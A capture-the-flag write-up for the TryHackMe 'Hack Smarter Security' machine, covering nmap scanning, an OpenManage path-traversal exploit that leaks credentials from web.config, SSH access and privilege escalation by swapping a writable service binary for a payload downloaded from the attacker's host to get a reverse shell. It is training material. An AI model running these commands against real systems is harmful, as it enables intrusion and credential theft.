> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/tryhackme-oscp-machines/thm-hack-smarter-security.md).

# THM - Hack Smarter Security

## Enumeration and Foothold

### NMAP

```bash
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 06-28-23  02:58PM                 3722 Credit-Cards-We-Pwned.txt
|_06-28-23  03:00PM              1022126 stolen-passport.png
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 0d:fa:da:de:c9:dd:99:8d:2e:8e:eb:3b:93:ff:e2:6c (RSA)
|   256 5d:0c:df:32:26:d3:71:a2:8e:6e:9a:1c:43:fc:1a:03 (ECDSA)
|_  256 c4:25:e7:09:d6:c9:d9:86:5f:6e:8a:8b:ec:13:4a:8b (ED25519)
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: HackSmarterSec
|_http-server-header: Microsoft-IIS/10.0
1311/tcp open  ssl/rxmon?
| ssl-cert: Subject: commonName=hacksmartersec/organizationName=Dell Inc/stateOrProvinceName=TX/countryName=US
| Issuer: commonName=hacksmartersec/organizationName=Dell Inc/stateOrProvinceName=TX/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-30T19:03:17
| Not valid after:  2025-06-29T19:03:17
| MD5:   4276:b53d:a8ab:fa7c:10c0:1535:ff41:2928
|_SHA-1: c44f:51f8:ed54:802f:bb94:d0ea:705d:50f8:fd96:f49f
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 
|     Strict-Transport-Security: max-age=0
|     X-Frame-Options: SAMEORIGIN
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     vary: accept-encoding
|     Content-Type: text/html;charset=UTF-8
|     Date: Wed, 11 Feb 2026 03:44:42 GMT
|     Connection: close
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "<http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd>">
|     <html>
|     <head>
|     <META http-equiv="Content-Type" content="text/html; charset=UTF-8">
|     <title>OpenManage&trade;</title>
|     <link type="text/css" rel="stylesheet" href="/oma/css/loginmaster.css">
|     <style type="text/css"></style>
|     <script type="text/javascript" src="/oma/js/prototype.js" language="javascript"></script><script type="text/javascript" src="/oma/js/gnavbar.js" language="javascript"></script><script type="text/javascript" src="/oma/js/Clarity.js" language="javascript"></script><script language="javascript">
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Strict-Transport-Security: max-age=0
|     X-Frame-Options: SAMEORIGIN
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     vary: accept-encoding
|     Content-Type: text/html;charset=UTF-8
|     Date: Wed, 11 Feb 2026 03:44:48 GMT
|     Connection: close
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "<http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd>">
|     <html>
|     <head>
|     <META http-equiv="Content-Type" content="text/html; charset=UTF-8">
|     <title>OpenManage&trade;</title>
|     <link type="text/css" rel="stylesheet" href="/oma/css/loginmaster.css">
|     <style type="text/css"></style>
|_    <script type="text/javascript" src="/oma/js/prototype.js" language="javascript"></script><script type="text/javascript" src="/oma/js/gnavbar.js" language="javascript"></script><script type="text/javascript" src="/oma/js/Clarity.js" language="javascript"></script><script language="javascript">
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: HACKSMARTERSEC
|   NetBIOS_Domain_Name: HACKSMARTERSEC
|   NetBIOS_Computer_Name: HACKSMARTERSEC
|   DNS_Domain_Name: hacksmartersec
|   DNS_Computer_Name: hacksmartersec
|   Product_Version: 10.0.17763
|_  System_Time: 2026-02-11T03:45:09+00:00
|_ssl-date: 2026-02-11T03:45:13+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=hacksmartersec
| Issuer: commonName=hacksmartersec
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-02-10T03:30:29
| Not valid after:  2026-08-12T03:30:29
| MD5:   3b8a:4501:3286:fa46:bda0:bed9:db9e:fc79
|_SHA-1: e591:460c:855c:7531:eba7:14b8:7898:eb8e:4bb6:6bc0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <https://nmap.org/cgi-bin/submit.cgi?new-service> :
```

### FTP

```bash
──(ajay㉿kali)-[~]
└─$ ftp 10.82.183.92                                                                            
Connected to 10.82.183.92.
220 Microsoft FTP Service
Name (10.82.183.92:ajay): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||49733|)
125 Data connection already open; Transfer starting.
06-28-23  02:58PM                 3722 Credit-Cards-We-Pwned.txt
06-28-23  03:00PM              1022126 stolen-passport.png
226 Transfer complete.
ftp> get Credit-Cards-We-Pwned.txt
local: Credit-Cards-We-Pwned.txt remote: Credit-Cards-We-Pwned.txt
229 Entering Extended Passive Mode (|||49736|)
125 Data connection already open; Transfer starting.
100% |***********************************************************************************************************************************************************************************************|  3722       36.68 KiB/s    00:00 ETA
226 Transfer complete.
3722 bytes received in 00:00 (36.39 KiB/s)
ftp> get stolen-passport.png
local: stolen-passport.png remote: stolen-passport.png
229 Entering Extended Passive Mode (|||49743|)
125 Data connection already open; Transfer starting.
 76% |*************************************************************************************************************************************************                                              |   764 KiB  763.97 KiB/s    00:00 ETAftp: Reading from network: Interrupted system call
  0% |                                                                                                                                                                                               |    -1        0.00 KiB/s    --:-- ETA
550 The specified network name is no longer available. 
WARNING! 3163 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
```

Downloaded the loot from the FTP service where anonymous access is permitted.

```bash
──(ajay㉿kali)-[~]
└─$ cat Credit-Cards-We-Pwned.txt 
VISA, 4929012623542946, 8/2027, 273
VISA, 4556638818403096, 8/2024, 166
VISA, 4024007166395359, 12/2027, 209
VISA, 4485714082654957, 12/2028, 834
VISA, 4716405563341310, 12/2023, 235
VISA, 4556430097066053, 7/2030, 493
VISA, 4916389512648686, 10/2026, 269

can be useful in password spraying if we neumerate any users.
```

### DELLEMC

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FzwiUgR9QUUDbOJ5rDwvo%2Fimage.png?alt=media&amp;token=83dd4904-68ae-4844-ad33-aecb98875039" alt=""><figcaption></figcaption></figure>

DELLEMC running on Port 1311.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FciptGsGYfRo2jpDxv5qb%2Fimage.png?alt=media&amp;token=7a253b59-8178-42e7-a846-353e048e350f" alt=""><figcaption></figcaption></figure>

Version is 9.4.0.2

A quick google search revealed that the version is vulnerable to  Path Traversal.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F1l2codkjTMN8IAcbhaoB%2Fimage.png?alt=media&amp;token=56a39550-e75b-456e-8a5e-5ba742f46cc3" alt=""><figcaption></figcaption></figure>

Found this POC online to exploit:

{% embed url="<https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2020-5377_CVE-2021-21514>" %}

```bash
──(ajay㉿kali)-[~/Downloads]
└─$ python3 CVE-2020-5377.py   192.168.170.217 10.82.183.92:1311
Session: 8C6815C614A10568FA937A892F8B7BE7
VID: 8C13EE0DECB682FC
file > /windows/win.ini
Reading contents of /windows/win.ini:
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

file > /inetpub/wwwroot/web.config
Reading contents of /inetpub/wwwroot/web.config:

file > \inetpub\wwwroot\web.config
Reading contents of \inetpub\wwwroot\web.config:

file > C:\inetpub\wwwroot\OMSA\web.config
Reading contents of C:\inetpub\wwwroot\OMSA\web.config:

file > \inetpub\wwwroot\hacksmartersec\web.config
Reading contents of \inetpub\wwwroot\hacksmartersec\web.config:
<configuration>
  <appSettings>
    <add key="Username" value="tyler" />
    <add key="Password" value="IAmA1337h4x0randIkn0wit!" />
  </appSettings>
  <location path="web.config">
    <system.webServer>
      <security>
        <authorization>
          <deny users="*" />
        </authorization>
      </security>
    </system.webServer>
  </location>
</configuration>

file > 
```

Found credentials for Tyler in the `web.config`

## Shell as Tyler

```bash
ssh tyler@10.82.183.92    
The authenticity of host '10.82.183.92 (10.82.183.92)' can't be established.
ED25519 key fingerprint is: SHA256:MvevGrInODrfb/nv+rYdT743Q0BOkhOmNo5qlrhXCUg
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.82.183.92' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See <https://openssh.com/pq.html>
tyler@10.82.183.92's password: 

Microsoft Windows [Version 10.0.17763.1821] 
(c) 2018 Microsoft Corporation. All rights reserved. 
                                                     
tyler@HACKSMARTERSEC C:\Users\tyler>         
```

```bash
tyler@HACKSMARTERSEC C:\Users\tyler\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users\tyler\Desktop

06/30/2023  07:12 PM    <DIR>          .
06/30/2023  07:12 PM    <DIR>          ..
06/21/2016  03:36 PM               527 EC2 Feedback.website
06/21/2016  03:36 PM               554 EC2 Microsoft Windows Guide.website
06/27/2023  09:42 AM                25 user.txt
               3 File(s)          1,106 bytes
               2 Dir(s)  14,110,310,400 bytes free

tyler@HACKSMARTERSEC C:\Users\tyler\Desktop>more user.txt
THM{4ll15n0tw3llw1thd3ll}
```

```bash
tyler@HACKSMARTERSEC C:\Users\tyler>curl <http://192.168.170.217:8000/winPEASx64.exe> --output winPEASx64.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 1891k  100 1891k    0     0   945k      0  0:00:02  0:00:02 --:--:--  864k
```

Dont know why executing winpeas gave me trouble so i uploaded the PrivescCheck.ps1 to the target.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FF9pkaASIAWBXjzq7UP11%2Fimage.png?alt=media&amp;token=1205d079-e20f-4551-bbe9-3f0b140c2de4" alt=""><figcaption></figcaption></figure>

\[\*] Status: Vulnerable - Severity: High - Execution time: 00:00:20.375

```bash
PS C:\Program FIles (x86)\Spoofer> icacls spoofer-scheduler.exe
spoofer-scheduler.exe BUILTIN\Users:(I)(F)
                      NT AUTHORITY\SYSTEM:(I)(F)
                      BUILTIN\Administrators:(I)(F)
                      APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                      APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
PS C:\Program FIles (x86)\Spoofer>

```

```bash
PS C:\Program FIles (x86)\Spoofer> echo "hello" > hello.txt 
PS C:\Program FIles (x86)\Spoofer> dir 

    Directory: C:\Program FIles (x86)\Spoofer

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/24/2020   9:31 PM          16772 CHANGES.txt
-a----        7/16/2020   7:23 PM           7537 firewall.vbs
-a----        2/11/2026   4:51 AM             16 hello.txt
-a----        7/24/2020   9:31 PM          82272 LICENSE.txt
-a----        7/24/2020   9:31 PM           3097 README.txt
-a----        7/24/2020   9:31 PM          48776 restore.exe
-a----        7/20/2020  11:12 PM         575488 scamper.exe
-a----        6/30/2023   6:57 PM            152 shortcuts.ini
-a----        7/24/2020   9:31 PM        4315064 spoofer-cli.exe
-a----        7/24/2020   9:31 PM       16171448 spoofer-gui.exe
-a----        7/24/2020   9:31 PM        4064696 spoofer-prober.exe
-a----        7/24/2020   9:31 PM        8307640 spoofer-scheduler.exe
-a----        7/24/2020   9:31 PM            667 THANKS.txt
-a----        7/24/2020   9:31 PM         217416 uninstall.exe

WE HAVE WRITE ACCESS ON TH DIRECTORY TOO.
```

The built in users have full access on the file so we remove the original file and place our payload where we can get a reverse shell or add our current user to administrator.

As we know there is AV in place lets use the nim shell in here to get root shell.

```bash
PS C:\Program FIles (x86)\Spoofer> sc.exe stop spoofer-scheduler

SERVICE_NAME: spoofer-scheduler
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x2
        WAIT_HINT          : 0x0

PS C:\Program FIles (x86)\Spoofer> Remove-Item spoofer-scheduler.exe -Force 
PS C:\Program FIles (x86)\Spoofer> dir 

    Directory: C:\Program FIles (x86)\Spoofer

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/24/2020   9:31 PM          16772 CHANGES.txt
-a----        7/16/2020   7:23 PM           7537 firewall.vbs
-a----        2/11/2026   4:51 AM             16 hello.txt
-a----        7/24/2020   9:31 PM          82272 LICENSE.txt
-a----        7/24/2020   9:31 PM           3097 README.txt
-a----        7/24/2020   9:31 PM          48776 restore.exe
-a----        7/20/2020  11:12 PM         575488 scamper.exe
-a----        6/30/2023   6:57 PM            152 shortcuts.ini
-a----        7/24/2020   9:31 PM        4315064 spoofer-cli.exe
-a----        7/24/2020   9:31 PM       16171448 spoofer-gui.exe
-a----        7/24/2020   9:31 PM        4064696 spoofer-prober.exe
-a----        2/11/2026   4:56 AM             19 stop
-a----        7/24/2020   9:31 PM            667 THANKS.txt
-a----        7/24/2020   9:31 PM         217416 uninstall.exe

PS C:\Program FIles (x86)\Spoofer> curl <http://192.168.170.217:8000/spoofer-scheduler.exe> -outfile spoofer-scheduler.exe 
PS C:\Program FIles (x86)\Spoofer> dir 

    Directory: C:\Program FIles (x86)\Spoofer

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/24/2020   9:31 PM          16772 CHANGES.txt
-a----        7/16/2020   7:23 PM           7537 firewall.vbs
-a----        2/11/2026   4:51 AM             16 hello.txt
-a----        7/24/2020   9:31 PM          82272 LICENSE.txt
-a----        7/24/2020   9:31 PM           3097 README.txt
-a----        7/24/2020   9:31 PM          48776 restore.exe
-a----        7/20/2020  11:12 PM         575488 scamper.exe
-a----        6/30/2023   6:57 PM            152 shortcuts.ini
-a----        7/24/2020   9:31 PM        4315064 spoofer-cli.exe
-a----        7/24/2020   9:31 PM       16171448 spoofer-gui.exe                                                                                                                                                                           
-a----        7/24/2020   9:31 PM        4064696 spoofer-prober.exe
-a----        2/11/2026   5:00 AM         379921 spoofer-scheduler.exe
-a----        2/11/2026   4:56 AM             19 stop
-a----        7/24/2020   9:31 PM            667 THANKS.txt
-a----        7/24/2020   9:31 PM         217416 uninstall.exe

PS C:\Program FIles (x86)\Spoofer>

**NOW RUN NETCAT AND START THE PROCESS AGAIN**

PS C:\Program FIles (x86)\Spoofer> sc.exe start spoofer-scheduler

```

```bash
PS C:\Program FIles (x86)\Spoofer> sc.exe stop spoofer-scheduler

SERVICE_NAME: spoofer-scheduler
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x2
        WAIT_HINT          : 0x0

PS C:\Program FIles (x86)\Spoofer> Remove-Item spoofer-scheduler.exe -Force 
PS C:\Program FIles (x86)\Spoofer> dir 

    Directory: C:\Program FIles (x86)\Spoofer

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/24/2020   9:31 PM          16772 CHANGES.txt
-a----        7/16/2020   7:23 PM           7537 firewall.vbs
-a----        2/11/2026   4:51 AM             16 hello.txt
-a----        7/24/2020   9:31 PM          82272 LICENSE.txt
-a----        7/24/2020   9:31 PM           3097 README.txt
-a----        7/24/2020   9:31 PM          48776 restore.exe
-a----        7/20/2020  11:12 PM         575488 scamper.exe
-a----        6/30/2023   6:57 PM            152 shortcuts.ini
-a----        7/24/2020   9:31 PM        4315064 spoofer-cli.exe
-a----        7/24/2020   9:31 PM       16171448 spoofer-gui.exe
-a----        7/24/2020   9:31 PM        4064696 spoofer-prober.exe
-a----        2/11/2026   4:56 AM             19 stop
-a----        7/24/2020   9:31 PM            667 THANKS.txt
-a----        7/24/2020   9:31 PM         217416 uninstall.exe

PS C:\Program FIles (x86)\Spoofer> curl <http://192.168.170.217:8000/spoofer-scheduler.exe> -outfile spoofer-scheduler.exe 
PS C:\Program FIles (x86)\Spoofer> dir 

    Directory: C:\Program FIles (x86)\Spoofer

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/24/2020   9:31 PM          16772 CHANGES.txt
-a----        7/16/2020   7:23 PM           7537 firewall.vbs
-a----        2/11/2026   4:51 AM             16 hello.txt
-a----        7/24/2020   9:31 PM          82272 LICENSE.txt
-a----        7/24/2020   9:31 PM           3097 README.txt
-a----        7/24/2020   9:31 PM          48776 restore.exe
-a----        7/20/2020  11:12 PM         575488 scamper.exe
-a----        6/30/2023   6:57 PM            152 shortcuts.ini
-a----        7/24/2020   9:31 PM        4315064 spoofer-cli.exe
-a----        7/24/2020   9:31 PM       16171448 spoofer-gui.exe                                                                                                                                                                           
-a----        7/24/2020   9:31 PM        4064696 spoofer-prober.exe
-a----        2/11/2026   5:00 AM         379921 spoofer-scheduler.exe
-a----        2/11/2026   4:56 AM             19 stop
-a----        7/24/2020   9:31 PM            667 THANKS.txt
-a----        7/24/2020   9:31 PM         217416 uninstall.exe

PS C:\Program FIles (x86)\Spoofer>

**NOW RUN NETCAT AND START THE PROCESS AGAIN**

PS C:\Program FIles (x86)\Spoofer> sc.exe start spoofer-scheduler

```

```bash
C:\Users\Administrator\Desktop> cd HAcking-Targets
C:\Users\Administrator\Desktop\HAcking-Targets> dir
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users\Administrator\Desktop\HAcking-Targets

06/30/2023  06:40 PM    <DIR>          .
06/30/2023  06:40 PM    <DIR>          ..
06/27/2023  09:40 AM                53 hacking-targets.txt
               1 File(s)             53 bytes
               2 Dir(s)  14,109,429,760 bytes free
C:\Users\Administrator\Desktop\HAcking-Targets> more hacking-targets.txt
Next Victims: 
**CyberLens, WorkSmarter, SteelMountain**
C:\Users\Administrator\Desktop\HAcking-Targets>
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/tryhackme-oscp-machines/thm-hack-smarter-security.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
